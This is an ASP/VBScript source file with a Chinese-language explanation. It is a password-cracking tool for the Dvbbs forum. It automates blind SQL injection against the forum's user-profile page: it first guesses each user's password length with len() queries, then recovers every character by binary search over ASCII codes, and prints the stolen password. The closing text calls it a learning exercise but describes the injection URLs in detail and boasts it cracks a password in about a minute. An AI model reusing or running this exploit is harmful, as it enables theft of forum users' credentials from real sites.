<%
response.buffer=false
'为防止程序陷入死循环,初始化一些最大重试值
Dim MaxPassLen,MaxPassAsc
MaxPassLen=20 '密码最大长度
MaxPassAsc=20
'==== 字符转换
Function bytes2BSTR(vIn)
strReturn = ""
For j = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,j,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,j+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
j = j + 1
End If
Next
bytes2BSTR = strReturn
End Function
' 下面是取网页内容 ==========
Function GetUrl(Url)
set oSend=createobject("Microsoft.XMLHTTP")
SourceCode = oSend.open ("GET",url,false)
oSend.send()
SourceCode = bytes2BSTR(oSend.responseBody)
GetUrl = SourceCode
End Function
'下面是判断返回页面效果
Function ChkPage(SourceCode,SucKey,ErrKey)
if Instr(SourceCode,SucKey) > 0 then
ChkPage=true '页面返回成功
exit function
end if
if Instr(SourceCode,ErrKey) > 0 then
ChkPage=false '页面出错
exit function
end if
ChkPage=false '关键字信息不对或者是页面未连接
response.write("关键字信息不对或者是页面未连接")
response.end
End Function
'开始破解
'Dim url,username,password,SucKey,
Dim PassLenUrl
Dim PassLen
Dim ChkPassLen
If request("begin")<>"" then
response.cookies("PassLen")=0
url=request("url")
username=request("username")
password=request("password")
SucKey=request("SucKey")
ErrKey=request("ErrKey")
response.write("第一步,破解密码长度
")
PassLen = 1
ChkPassLen = false
Do while not ChkPassLen
PassLenUrl = Url & username & "'%20and%20len(" & password & ")=" & PassLen & "%20and%20'1'='1"
response.write("当前测试密码位数为“" & PassLen & "”,请稍等......
")
ChkPassLen = ChkPage(GetUrl(PassLenUrl),SucKey,ErrKey)
If ChkPassLen Then
response.write("成功!!!密码位数已经测试出来了,开始测试具体位数
")
exit do
Else
response.write("不行,继续下一位测试!
")
End If
If PassLen > MaxPassLen then
response.write( "密码位数未能测试出,请确认是否有此用户或重新调整密码长度范围")
response.end
exit do
End If
PassLen = PassLen + 1
Loop
response.write ("已经测试出密码长度为" & PassLen & ",开始测试具体密码值
")
'循环每一位
Dim Asc1,Asc2,Asc10,Asc20,Ascstr
'Dim AscArr(PassLen)
Dim ChkPass,Asctemp1,Asctemp,count
Ascstr = ""
For i=1 to PassLen
ChkPass = false
Asc1 = 33
Asc2 = 126
response.write "开始破解第" & i & "位密码
"
'用二分法取asc码范围
count=1
suc=false
Do while not suc
Asctemp1=Asctemp
if (Asc2-Asc1) mod 2 = 1 then
Asctemp=(Asc2-Asc1-1)/2
else
Asctemp=(Asc2-Asc1)/2
end if
response.write "划定密码范围为:" & chr(Asc1) & " -- " & chr(Asc2) & PassLenUrl & "
"
PassLenUrl = Url & username & "'%20and%20asc(mid(password,"&i&",1))>=" & int(Asc1) & "%20and%20asc(mid(password,"&i&",1))<=" & int(Asc2) & "%20and%20'1'='1"
response.write "划定密码范围为:" & chr(Asc1) & " -- " & chr(Asc2) & PassLenUrl & "
"
ChkPass = ChkPage(GetUrl(PassLenUrl),SucKey,ErrKey)
if Asc1 = 33 and Asc2 = 126 and not ChkPass then
response.write "密码不在所设定ASC码范围内"
response.end
exit do
end if
if ChkPass then
Asc10=Asc1
Asc20=Asc2
response.write("密码在该范围内
")
if Asc1=Asc2 then Suc = true
Asc2 = Asc1 + Asctemp
else
Asc1 = Asc20-Asctemp1
Asc2 = Asc20
response.write("不在该范围内,改试另一范围
")
end if
count=count+1
if count>MaxPassAsc then
response.write("死循环了!")
response.end
exit do
end if
Loop
Ascstr=Ascstr & chr(Asc1)
response.write"
当前破解进度(“"&Ascstr&"”)
"
Next
response.write"" & username & "的密码已经破解成功!!!!!!!(" & Ascstr & ")
"
else
%>
动网论坛暴力破解程序
<%end if%>
首先申明该程序只是用来学习之用,请勿用在非法用途!!!!
该程序基于“星之海洋”的《ASP动网论坛漏洞分析》
例如要破一个名叫abc的用户密码,首先察看abc的用户资料,给出的连接是http://xxxxx/dispuser.ASP?name=abc,在dispuser.ASP中,读取参数的语句是: username=trim(request(“name”)),数据库的查询的语句是: sql=”select * from [user] where username=’”&username&”’”,看得出来, abc就是直接被作为了dispuer的一个参数username。另外,如果该用户不存在,程序就会给出提示,既然如此,我们就再写入个查询密码的条件,在where username=abc后面加上and userpassword=”******”,可以先用len函数试出用户的密码位数,地址就这么写http://xxxxx/dispuser.ASP?name=abc'%20and%20len(userpassword)=5%20and%20'1'='1,这么看可能不好理解,放到sql语句里其实就是这副样子:sql=“select * from [User] where username='abc' and len(UserPassword)=5 and '1'='1'”,现在明白点了吧,%20是空格,abc后面的单引号和’1’=’1里的单引号都是为了和sql语句相匹配。奇怪,该用户不存在,喔?那就说明符合这个条件的用户没有,继续,把5换成6,7,8,依此类推,只要能显示出用户资料了,就说明密码位数猜对了。接下来要做的就是试每位的密码是多少了,继续要用到VBS,可以用left或right或mid函数,http://xxxxx/dispuser.ASP?name=abc'%20and%20left(userpassword,1)='a,如果猜对了就给出用户资料,猜错了就给出该用户不存在的提示,那么我们就可以直接在程序里面用XMLhttp来获取指定网址的内容,然后根据提供的关键字来判断是否猜对了,先用前面说的len方法从1开始穷举知道搞定为止,然后在针对每一位密码用mid函数集合键盘的asc码的范围(33到126),在程序里面用二分法来逐步缩小范围,几个循环就搞定了,呵呵,经实验发现效果显著,基本一分钟就可以破解出来一个:)!(注意,只适用了部分动网论坛版本)